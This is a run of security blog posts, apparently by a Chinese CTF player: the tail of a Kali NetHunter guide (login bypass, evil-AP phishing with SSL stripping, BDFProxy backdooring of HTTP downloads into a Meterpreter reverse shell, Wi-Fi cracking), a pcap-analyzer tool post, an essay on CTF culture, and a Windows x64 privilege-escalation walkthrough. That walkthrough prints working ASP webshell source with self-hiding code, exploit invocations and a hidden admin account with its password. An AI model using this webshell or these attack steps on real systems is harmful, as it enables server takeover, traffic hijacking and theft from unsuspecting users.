<p class="md_block"> <span class="md_line">The connected PC should show a newly attached removable disk (or floppy drive). If it does not, adjust the settings on the configuration page (the USB Setup Wizard can guide you)</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-55.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Now reboot the password-protected PC and select the boot device in the BIOS</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-56.jpg" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">If the image loaded successfully, you will see the galloping logo:</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-57.jpg" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Then simply press Enter at the password prompt to bypass authentication and log in</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-58.jpg" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Note that logging in this way does not let you directly change or remove the system password.</span> </p>
<h4 id="toc_9">0x09 WarDriving</h4>
<p class="md_block"> <span class="md_line">I still remember the stories of our predecessors doing war driving with a laptop over their shoulder. With today's smart devices, a portable device can take over that job. The only problem is that I have yet to find a really suitable and intuitive war-driving tool; I hope someone will develop or recommend one.</span> </p>
<p class="md_block"> <span 
class="md_line">Under NetHunter, Kismet in the Wireless module of the Kali Menu is the default war-driving tool, but its interface is, let us say, too beautiful to look at:</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-60.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">As a fallback I recommend the WigleWifi app. Be careful not to upload your data by accident. It is easy to use, though the interface is ugly.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-61.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">Fortunately the data can be stored locally as an SQLite database.</span> </p>
<h4 id="toc_10">0x0A Mana EvilAP honeypot</h4>
<p class="md_block"> <span class="md_line">Want to set up a CMCC wireless network to phish and hijack traffic, but don't have a Pineapple with you? Take out your phone and start a honeypot. :)</span> </p>
<p class="md_block"> <span class="md_line">The Mana honeypot uses the same Karma patch for Hostapd as the Pineapple. It deceives users joining wireless networks so that they connect seamlessly to a fake AP, enabling follow-up attacks.</span> </p>
<p class="md_block"> <span class="md_line">Note that NetHunter's wireless attack modules mostly need an external USB wireless adapter attached over OTG. Any adapter with a mainstream chipset (try whether Kali recognises it directly) will do. The WN722N is recommended; the mini EDUP adapter is more broadly compatible (the Raspberry Pi also recognises it directly), but its signal strength... is what you would expect.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-70.jpg" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">The Mana honeypot has several hacking modes, all sh scripts that can be freely customised. Mana is installed under:</span> </p>
<pre><code>/usr/share/mana-toolkit</code></pre>
<p class="md_block"> <span class="md_line">The start scripts are stored here:</span> </p>
<pre><code>/usr/share/mana-toolkit/run-mana</code></pre>
<p class="md_block"> <span class="md_line">Captured traffic files are stored in:</span> </p>
<pre><code>/var/lib/mana-toolkit</code></pre>
<p class="md_block"> <span class="md_line">The Mana honeypot page in NetHunter Home makes it convenient to edit the configuration files:</span> </p>
<p class="md_block"> <span class="md_line">Hostapd configuration file</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-71.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span 
class="md_line">DHCP server configuration file</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-72.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">DNS spoofing configuration file</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-73.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">There are several service start scripts, all of which can be freely edited:</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-74.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">The script in the screenshot above is start-nat-full.sh. It requires a USB wireless adapter (so that there is an upstream link), puts wireless clients behind NAT, and starts all the scripts, including firelamb, sslstrip, sslsplit and so on, capturing and saving traffic.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-75.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">start-nat-simple.sh likewise has an upstream link but does not start firelamb, sslstrip, sslsplit and the other scripts.</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-76.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">start-nat-simple-bdf.sh adds the BDF malicious-code injection tool; a later section explains that attack idea.</span> </p>
<p class="md_block"> <span class="md_line">In addition there are</span> </p>
<p class="md_block"> <span class="md_line">start-noupstream.sh</span> </p>
<pre><code>Mana starts as a fake AP with no internet access, but it can still attract devices whose Wi-Fi is on by default to connect automatically, and captures their information.</code></pre>
<p class="md_block"> <span class="md_line">start-noupstream-eap.sh</span> </p>
<pre><code>Mana again has no internet access, but performs EAP attacks</code></pre>
<p class="md_block"> <span class="md_line">After editing the start script, press Start Attack; a dialog lets you tick which start script to run:</span> </p>
<p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-77.png" alt="img" title="" ></span> </p>
<p class="md_block"> <span class="md_line">and the service starts.</span> </p>
<h4 
id="toc_11">0x0B Backdooring Executable Over HTTP</h4> <p class="md_block"> <span class="md_line">This attack idea is rather interesting. The feature arrived in the NetHunter release of 5 January this year as Kali NetHunter's newest and flashiest trick; it comes from <a class="md_compiled" href="https://github.com/secretsquirrel/">secret squirrel</a>'s GitHub projects <a class="md_compiled" href="https://github.com/secretsquirrel/the-backdoor-factory">the-backdoor-factory</a> and <a class="md_compiled" href="https://github.com/secretsquirrel/BDFProxy">BDFProxy</a>, and lets us inject shellcode into binaries transferred over plain HTTP with little effort.</span> </p> <p class="md_block"> <span class="md_line">First set up a Mana honeypot, keeping the default SSID internet, and start the service</span> </p> <pre><code>cd /usr/share/mana-toolkit/run-mana
./start-nat-simple-bdf.sh</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-80.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Open another shell and edit bdfproxy.cfg. This configuration file holds the default payloads for the different platforms, which you can swap as you like. Because of a display problem, editing text with nano redraws the screen line by line, so another editor is preferable. Here only the IP is changed, to 192.168.1.151; it can also be configured under MANA Evil Access Point in the NetHunter main panel.</span> </p> <pre><code>nano /etc/bdfproxy/bdfproxy.cfg</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">With the IP configured, simply type bdfproxy in the shell to run it.</span> </p> <p class="md_block"> <span class="md_line">Open yet another shell and start Metasploit</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-81.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Everything is ready; now wait for a PC connected to the honeypot AP to download a binary. The demonstration here downloads Everything (a wonderful tool) via Baidu:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-82.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Running Everything shows a self-check failure prompt, because the payload was injected</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-83.png" alt="img" title="" ></span> </p> <p class="md_block"> <span 
class="md_line">Checking MSF, a reverse shell has come back. The self-check failure prompt above was in fact captured for me by Meterpreter's screenshot command :)</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-84.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">It has to be said, this new feature is really cool.</span> </p> <h4 id="toc_12">0x0C Cracking with Wifite</h4> <p class="md_block"> <span class="md_line">Getting to the end without mentioning wireless cracking would be wrong ;) The Wifite cracking tool recommended by NetHunter was one of the first features it integrated. A mobile device's portability makes it easier to run Wi-Fi security tests anywhere, anytime: attach an external wireless adapter and capturing and cracking is easy. Cracking the captured handshake directly on the mobile device is not recommended, though; if a few minutes of running gives no result, move to a high-performance machine, or the device may easily freeze.</span> </p> <p class="md_block"> <span class="md_line">With the external wireless adapter connected, choose Launch Wifite from the NetHunter main menu to enter it</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-90.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Pick the adapter to put into monitor mode: choose Wlan1</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-91.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Scanning starts and refreshes every 5 seconds; once the target is confirmed, press CTRL+C to stop scanning</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-92.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Enter the target's number; here <code>XDSEC-WIFI</code> is chosen, so enter 2</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-93.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">After a successful capture it automatically starts a dictionary attack; here the dictionary was cleverly deleted beforehand, so it exits on its own</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-94.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Captured handshakes are stored under /data/local/kali-armhf/HS, named SSID+MAC</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/nethunter-95.png" alt="img" title="" ></span> </p> 
<p class="md_block"> <span class="md_line">If the target has WPS enabled, PIN cracking starts automatically.</span> </p> <p class="md_block"> <span class="md_line">Wifite is fairly foolproof and easy to operate, which suits mobile devices. The author has succeeded a few times at testing wireless passwords; once on the network, tools such as zANTI can be used to play around :)</span> </p> <h4 id="toc_13">0x0D Closing Words</h4> <p class="md_block"> <span class="md_line">To close: most of NetHunter's practical uses have been introduced above. The article was written jointly by curly-haired zing and straight-haired le4f; our abilities are limited, so please point out any shortcomings. Consider this a starting point; we look forward to more tricks being shared.</span> </p> Online Packet Analysis Implementation - Online Pcap Analyzer 2015-01-11T16:00:00Z post/pcap-online-analyzer Sword Soul <h4 id="toc_0">0x00 Preface</h4> <p class="md_block"> <span class="md_line">2015 has arrived before I noticed. I have not posted in a long time, and wonder how many readers are still following :(</span> </p> <p class="md_block"> <span class="md_line">The new year's new articles are not ready yet, so first a tool I just wrote: Pcap-Analyzer, a lightweight online analyzer for pcap capture files; anyone who needs it is welcome to adapt it.</span> </p> <p class="md_block"> <span class="md_line">Project: <a class="md_compiled" href="https://github.com/le4f/pcap-analyzer">https://github.com/le4f/pcap-analyzer</a></span> </p> <p class="md_block md_has_block_below md_has_block_below_ul"> <span class="md_line">A few possible uses:</span> </p> <ul> <li class="md_li"> Forensic analysis of some captures: naturally no match for Wireshark, but some functions are more intuitive than Wireshark's </li> <li class="md_li"> A wireless packet decryption and analysis module could be added </li> <li class="md_li"> With a user management module added, mobile devices could upload captured packets (MITM and the like) for analysis </li> </ul> <h4 id="toc_1">0x01 Features</h4> <ul> <li class="md_li"> Lightweight and readable, but not suited to large captures (something to improve on) </li> <li class="md_li"> Basic upload, storage and download </li> <li class="md_li"> Packet analysis <ul> <li class="md_li"> Packet list </li> <li class="md_li"> Packet detail lookup </li> <li class="md_li"> Filtering </li> <li class="md_li"> Packet statistics (source/destination IP/port) </li> <li class="md_li"> Web request extraction </li> <li class="md_li"> DNS request extraction </li> <li class="md_li"> Mail traffic extraction </li> </ul> </li> </ul> <h4 id="toc_2">0x02 Directory Layout</h4> <pre><code>. 
├── app.py (runs the server)
├── img (screenshots)
├── server
│   ├── __init__.py (core)
│   ├── func.py (helper functions)
│   ├── views.py (views)
│   ├── pcapfile (upload directory)
│   ├── db (database)
│   ├── static (static files)
│   └── templates (templates)
├── readme.md (project description)
└── requirements.txt (Python library dependencies)</code></pre> <!--block_code_end--> <h4 id="toc_3">0x03 Install and Run</h4> <ul> <li class="md_li"><code>$ git clone https://github.com/le4f/pcap-analyzer.git</code> </li> <li class="md_li"><code>$ cd pcap-analyzer</code> </li> <li class="md_li"><code>$ pip install -r requirements.txt</code> </li> <li class="md_li"><code>$ python app.py</code> </li> <li class="md_li"><code>View http://localhost:8080/</code> </li> </ul> <h4 id="toc_4">0x04 Screenshots</h4> <blockquote> <p class="md_block"> <span class="md_line"> Upload page</span> </p> </blockquote> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/pcap-analyzer-01.png" alt="img" title="" ></span> </p> <blockquote> <p class="md_block"> <span class="md_line"> Analysis page</span> </p> </blockquote> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/pcap-analyzer-02.png" alt="img" title="" ></span> </p> <blockquote> <p class="md_block"> <span class="md_line"> Filter</span> </p> </blockquote> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/pcap-analyzer-03.png" alt="img" title="" ></span> </p> <blockquote> <p class="md_block"> <span class="md_line"> Packet details</span> </p> </blockquote> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/pcap-analyzer-04.png" alt="img" title="" ></span> </p> <blockquote> <p class="md_block"> <span class="md_line"> Packet overview (source/destination IP/Port)</span> </p> </blockquote> <p class="md_block md_has_block_below 
md_has_block_below_blockquote"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/pcap-analyzer-05.png" alt="img" title="" ></span> </p> <blockquote> <p class="md_block"> <span class="md_line"> Web requests</span> </p> </blockquote> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/pcap-analyzer-06.png" alt="img" title="" ></span> </p> <blockquote> <p class="md_block"> <span class="md_line"> DNS requests</span> </p> </blockquote> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/pcap-analyzer-07.png" alt="img" title="" ></span> </p> <blockquote> <p class="md_block"> <span class="md_line"> Mail traffic</span> </p> </blockquote> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/pcap-analyzer-08.png" alt="img" title="" ></span> </p> <h4 id="toc_5">0x05 Dependencies</h4> <ul> <li class="md_li"> <a class="md_compiled" href="http://flask.pocoo.org">Flask</a> </li> <li class="md_li"> <a class="md_compiled" href="http://semantic-ui.com">Semantic-UI</a> </li> <li class="md_li"> <a class="md_compiled" href="http://jquery.com/">jQuery</a> </li> <li class="md_li"> <a class="md_compiled" href="http://kiminewt.github.io/pyshark/">PyShark</a> </li> <li class="md_li"> <a class="md_compiled" href="https://github.com/mher/chartkick.py">Chartkick</a> </li> <li class="md_li"> <a class="md_compiled" href="http://api.highcharts.com/highcharts">Highcharts</a> </li> </ul> <blockquote> <p class="md_block"> <span class="md_line"> Thanks to the following projects, used for reference</span> </p> </blockquote> <ul> <li class="md_li"> <a class="md_compiled" href="https://github.com/thepacketgeek/cloud-pcap">Cloud-Pcap</a> </li> <li class="md_li"> <a class="md_compiled" href="https://github.com/madpowah/ForensicPCAP">ForensicPcap</a> </li> </ul> <h4 id="toc_6">0x06 Summary</h4> <p class="md_block"> <span 
class="md_line">Pcap-Analyzer is not yet suited to analysing large captures (it takes too long), and is not suited to being deployed straight into production (it is not secure).</span> </p> <p class="md_block"> <span class="md_line">It is meant as code sharing; contact me with any problems or ideas.</span> </p> Some Thoughts on CTF - About Capture The Flag 2014-11-09T16:00:00Z essay/about-ctf Sword Soul <p class="md_block"> <span class="md_line">A good friend wrote <a class="md_compiled" href="http://z1ng.net/post/pieces/ctfde-xie-gan-xiang">Some Thoughts on CTF</a> a while ago; here is my own, to commemorate these years of playing CTF.</span> </p> <p class="md_block"> <span class="md_line">In 2011, fresh out of high school, I was introduced by Tm3y to the cracking stage of ISCC2011 (<a class="md_compiled" href="/post/writeup/-ctf-iscc2011-qual-writeup">the write-up is here</a>). It was the first time I learned that this kind of hack game existed, and solving the challenges step by step both taught me things and confirmed what I had learned. It has to be said that ISCC influenced many people as an introduction to the field.</span> </p> <p class="md_block"> <span class="md_line">At Xidian, in XDSEC, I saw the second Xidian network attack and defence contest, made many friends, and came to understand that there is always someone better and everyone has their strengths. At the time a few companies in the northwest held contests to promote their systems, hardware or lab platforms, so I played several with ly; not many students in the northwest could play this kind of game, so we were lucky enough to win titles while learning. Contests were still mostly the traditional form of small challenges plus practical penetration; occasionally I saw challenges set by Syclover and checked with CasperKid about them, but the contests were always a lot of fun.</span> </p> <p class="md_block"> <span class="md_line">In 2012 I took charge of the actual environment for the Xidian contest. The finalists I met that year are all working now, except that adorable one from Light 4 Freedom, em ;-)</span> </p> <p class="md_block"> <span class="md_line">In 2013 the contest was renamed from XDCSC to XDCTF; at that time nobody in China was yet using CTF to describe attack-and-defence contests. The final's practical environment was complex enough but not very reasonable, yet it fixed XDCTF's character: practical network attack and defence, progressing together. Meanwhile the name CTF, pushed by Blue-Lotus, was turning up everywhere in China; all kinds of organisations, schools and companies were running CTFs, and I had a faint sense that another ACM era was coming.</span> </p> <p class="md_block"> <span class="md_line">In 2014 the L team I organised started trying CTFtime events; playing straight through two days and nights in several contests was an unforgettable experience. I also meant to use XDCTF 2014 to push a domestic alternative to CTFtime; then, by coincidence or inevitability, I learned that Mr. Zhuge was preparing the XCTF league, modelled on CTFtime abroad but with much stronger control over the contests under it, hence the league final. Our plan was cancelled for various reasons.</span> </p> <p class="md_block"> <span class="md_line">Over nearly four years my view of CTF has swung back and forth. I wanted to push a practical CTF format, but eventually understood that however well you simulate the real thing, many elements of real work are missing, including the players' mindset; all you can do is make the environment as close to real as possible. Along the way I have complained about all sorts of pointless challenges, and have also come to appreciate heige's view: why play contests at all? Every trade has its specialists, but contests are not like that, and doing badly easily earns contempt.</span> </p> <p class="md_block"> <span class="md_line">So I prefer to see CTF as an entertaining hack game that broadens horizons. But the domestic scene is clearly not that innocent, and there is nothing wrong in itself with a CTF tied to rewards: play well, win fame and fortune; play badly, learn where you fall short. Yet as the stakes grow, so do the conflicts. AliCTF's online verification took longer than the contest itself, probably because of the final's generous prizes. I have always felt that forensic checks and phone verification are an insult to CTF itself, a helpless surrender to reality, but reality is just that frustrating :(</span> </p> <p class="md_block"> <span 
class="md_line">As it happens, a young member L had just recruited played HCTF in the XCTF league these past days. Full of energy, he solved a challenge at 4 a.m.; on getting up early he found L's account banned. The organisers said that L and WarGame had obtained the flag at nearly the same time with similar blind-injection statements, and announced on IRC that L and WarGame had cheated. The young man then contacted the organisers himself with his solution, and the account was restored, but no clarification was posted on IRC, review was said to be ongoing, and his approach was declared an &quot;unintended vulnerability&quot;: the solution was ruled invalid and awarded only 100 points.</span> </p> <p class="md_block"> <span class="md_line">Being lazy, I only got up at noon and heard about it; I asked the young man who solved it and he did not know the WarGame team at all. I contacted the organisers demanding our name be cleared; they said there were still objections and review was needed. In the afternoon I learned through other channels that WarGame's solver had appealed to the organisers too, and they still held their doubts about both of our teams.</span> </p> <p class="md_block"> <span class="md_line">The young man is now very angry, and I think anyone would be: being labelled a cheat for a challenge you genuinely worked hard to solve hurts badly, to your skill and your character both.</span> </p> <p class="md_block"> <span class="md_line">In my humble view, teams playing until four or five in the morning is a mark of respect for the organisers' challenges; but organisers assuming the worst of participants, with insufficient evidence, announcing without verification that teams cheated merely because it was &quot;too much of a coincidence to explain&quot;, and still preferring to believe the coincidence inexplicable after both teams objected and presented their own solutions, is not respect for the participants or the teams.</span> </p> <p class="md_block"> <span class="md_line">As for the XCTF league format, it still has to mature; at least from where I stand some of the current rules need improvement. Also, contest after contest it is the same few contest veterans; do you really not get bored? @internet-celebrity redrain ;-)</span> </p> <p class="md_block md_has_block_below md_has_block_below_blockquote"> <span class="md_line">The future belongs to the people of the future. I will just dream once more of a future XDCTF, hoping it comes closer to the real thing :-)</span> </p> <blockquote> <p class="md_block"> <span class="md_line"> XDCTF --- network attack and defence, growing together.</span> </p> </blockquote> <pre><code>Thanks to everyone who came to XDCTF over these four years.</code></pre> <!--block_code_end--> A Roundup of Windows x64 Privilege Escalation Exploits - Windows x64 Local Privilege Escalation 2014-10-26T16:00:00Z post/windows-x64-local-privilege-escalation Sword Soul <p class="md_block"> <span class="md_line">First published on <a class="md_compiled" href="http://www.secpulse.com/archives/1597.html">SecPulse</a>; do not repost without permission.</span> </p> <h4 id="toc_0">0x00 Preface</h4> <p class="md_block"> <span class="md_line">After CVE-2014-4113 appeared, privilege escalation on x64 enjoyed another brief moment of light. Before this vulnerability was disclosed, PR, the IIS overflow, LPK hijacking and the like had no effect on 64-bit versions; one public exploit did work, known as MS10048x64.</span> </p> <p class="md_block"> <span class="md_line">This article simply records the exploits that escalate privileges on x64 and the testing process. Escalation that depends on third-party services (such as MSSQL/MySQL) is not considered for now.</span> </p> <pre><code>Test environment: Windows Server 2003 Enterprise x64 Edition - VL
IIS 6.0</code></pre> <!--block_code_end--> <h4 id="toc_1">0x01 First, Hand-Write an AspExec</h4> <p class="md_block"> <span class="md_line">Before testing escalation exploits, assume we already have a one-line backdoor.</span> </p> <p class="md_block"> <span 
class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-01.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">The virtual terminal shows insufficient privileges; quietly upload a cmd.exe, and after setting the variables commands execute normally. Throw the latest CVE-2014-4113 exploit at it first</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-02.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Cleverly, we notice no reaction at all, and the same shows with ms10048. 64-bit escalation exploits differ from 32-bit ones: on 32-bit there are exploits that escalate from the virtual terminal with no arguments, and even when arguments are passed they run like this:</span> </p> <pre><code>c:\cmd.exe /c c:\exp.exe parms</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">But the x64 exploits need to be run like this:</span> </p> <pre><code>c:\exp.exe c:\recycler\server.exe</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">Uploading a full-size webshell by hand would run the exploit, but the obsessive among us prefer to do it ourselves (also known as reinventing the wheel XD). kyo327 touched on this in 《浅谈在webshell下执行命令》 (A brief discussion of executing commands under a webshell); here is part of the code for a first look:</span> </p> <pre><code>&lt;object runat=server id=shell scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"&gt;&lt;/object&gt;
&lt;%if err then%&gt;
&lt;object runat=server id=shell scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"&gt;&lt;/object&gt;
&lt;% end if %&gt;
&lt;%
'exec command
Dim path,parms,method,result
path=Trim(Request("path"))
parms=Trim(Request("parms"))
method=Trim(Request("submit"))
result=""
If path="" Then path="C:\WINDOWS\system32\cmd.exe"
If parms="" Then parms="/c "
If method="wscript.shell" Then
    result=shell.exec(path&amp;" "&amp;parms).stdout.readall
Elseif method="shell.application" Then
    set newshell=createobject("shell.application")
    newshell.ShellExecute path,parms,"","open",0
    result="Shell.application Execute OK."
Elseif method="self.delete" Then
    file.attributes = 0
    fso.deletefile(file_name)
    set fso = nothing
End If
%&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">The above executes commands in two ways, via Wscript.shell and Shell.application. For a little more stealth, a few lines of protection code are added (read-only, system, hidden attributes):</span> </p> <pre><code>&lt;%
' hidden shell
dim file_name
file_name = Server.MapPath("./") &amp; Replace(Request.ServerVariables("Script_Name"),"/","\")
set fso = createobject("scripting.filesystemobject")
set file = fso.getfile(file_name)
file.attributes = 1+2+4
%&gt;</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">The final result looks like this:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-03.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Hidden attributes:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-04.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">The top left shows the supported components; on the right, path takes the path of the program to run (such as the uploaded cmd or exploit) and parms takes the arguments (running cmd needs /c, the exploit does not)</span> </p> <p class="md_block"> <span class="md_line">The three buttons mean: run the command via wscript.shell / run the command via Shell.application / delete the script itself</span> </p> <p class="md_block"> <span class="md_line">A simple example:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-05.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">The code above is open-sourced here:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><a class="md_compiled" href="https://github.com/le4f/aspexec">https://github.com/le4f/aspexec</a></span> </p> <h4 id="toc_2">0x02 MS10048 Privilege Escalation</h4> <p class="md_block"> <span class="md_line">The MS10048 exploit comes in 32- and 64-bit versions; the vulnerability is a local privilege escalation in xxxCreateWindowEx() when creating a window.</span> </p> <p class="md_block"> <span class="md_line">On 64-bit it can be used to run a trojan backdoor or escalate privileges. First take K8Team's parameterless add-user program, which adds the user through the API and so works even when net1.exe has been deleted or disabled:</span> </p> <pre><code>username k8team$, password k8team!@#</code></pre> 
<!--block_code_end--> <p class="md_block"> <span class="md_line">With AspExec, escalation is easy: upload the exploit (ms10048.exe) and the add-user program (user.exe)</span> </p> <pre><code>Path: c:\inetpub\wwwroot\ms10048.exe
Parms: c:\inetpub\wwwroot\user.exe</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">Note that no /c argument is needed; whether to use wscript.shell or shell.application depends on the environment. Taking the default (wscript.shell), there is a short delay after execution:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-06.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Checking the target host's users: the account was added</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-07.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">Replacing user.exe with some other backdoor works the same way. The x64 systems affected by ms10048 are mainly Windows 2003; for newer systems, test CVE-2014-4113 instead</span> </p> <h4 id="toc_3">0x03 CVE-2014-4113 Privilege Escalation</h4> <p class="md_block"> <span class="md_line">Compared with MS10048, the new exploit works much better. It also comes in 32/64-bit versions, and is again tested by adding an account with user.exe:</span> </p> <pre><code>Path: c:\inetpub\wwwroot\64.exe
Parms: c:\inetpub\wwwroot\user.exe</code></pre> <!--block_code_end--> <p class="md_block"> <span class="md_line">After uploading and running 64.exe (the exploit), the output is as follows:</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-08.png" alt="img" title="" ></span> </p> <p class="md_block"> <span class="md_line">With practically no noticeable delay, the account is added smoothly</span> </p> <p class="md_block"> <span class="md_line md_line_dom_embed"><img class="md_compiled " src="/img/x64-09.png" alt="img" title="" ></span> </p> <h4 id="toc_4">0x04 Summary</h4> <p class="md_block"> <span class="md_line">The above is only a simulated test of a real environment, with a bit of code shared along the way ;)</span> </p> <p class="md_block"> <span class="md_line">Corrections and suggestions are welcome. When new exploits appear, the author will add tests promptly.</span> </p> [CTF]AliCTF-Final-2014-Writeup 2014-10-19T16:00:00Z writeup/-ctf-alictf-final-2014-writeup Sword Soul <p class="md_block"> <span class="md_line">::L Team:: <a class="md_compiled" 
href="http://l-team.org/">http://l-team.org</a></span> </p> <h4 id="toc_0">0x00 Preface</h4> <p class="md_block"> <span class="md_line">At the recent AliCTF on-site final, having never played a GameBox attack-and-defence CTF final before, we lacked experience; here is a short summary, shared for others too.</span> </p> <p class="md_block"> <span class="md_line">Contest site: http://www.alictf.com/</span> </p> <p class="md_block"> <span class="md_line">The final had two kinds of challenges: attack-and-defence GameBox challenges (head-to-head: analyse your own GameBox files to find the vulnerabilities, attack other teams to grab their flag files for points, and defend against their attacks), and jeopardy-style NPC challenges (attack a specified environment according to the challenge description to get the flag).</span> </p> <h4 id="toc_1">0x01 GameBox</h4> <p class="md_block"> <span class="md_line">GameBox was split into Bin1/Bin2 and Web1/Web2; Bin1 and Web1 were open at the start. Each challenge had an account with the privileges to run it, and an account named CTF was provided that could modify (patch) every challenge's files.</span> </p> <p class="md_block"> <span class="md_line">Note that running an ordinary service such as Bin1 under the CTF account creates a security hole (it can read other flags, such as Bin2's); some teams did come to grief this way during the final.</span> </p> <p class="md_block"> <span class="md_line">When the contest began we lacked awareness of this and never considered that a service could go down (failing the checker and losing points). Although we found several vulnerabilities early that could make the service exit, we only thought about grabbing flags and shells, not about scoring by knocking out other teams' services. By the time the organisers mentioned it, most teams had already lost a lot of points. That was one lesson learned about this kind of CTF.</span> </p> <p class="md_block"> <span class="md_line">Later, with all sorts of payloads hitting frequently, the service crashed often, but a watchdog script takes care of that. Bash was quite restricted, so Python did the job.</span> </p> <p class="md_block"> <span class="md_line">For the web CMS, the first protective steps (changing the admin panel path and password, and so on) came first; a WAF can be added, and the logs analysed to see which pages the official checker visits so that it keeps passing. Then analyse where the actual vulnerabilities are.</span> </p> <p class="md_block"> <span class="md_line">Over the two days, apart from the unnoticed downtime at the start, patches went in promptly; although our exploits only took three flags in the end, the defence held up fairly well and we 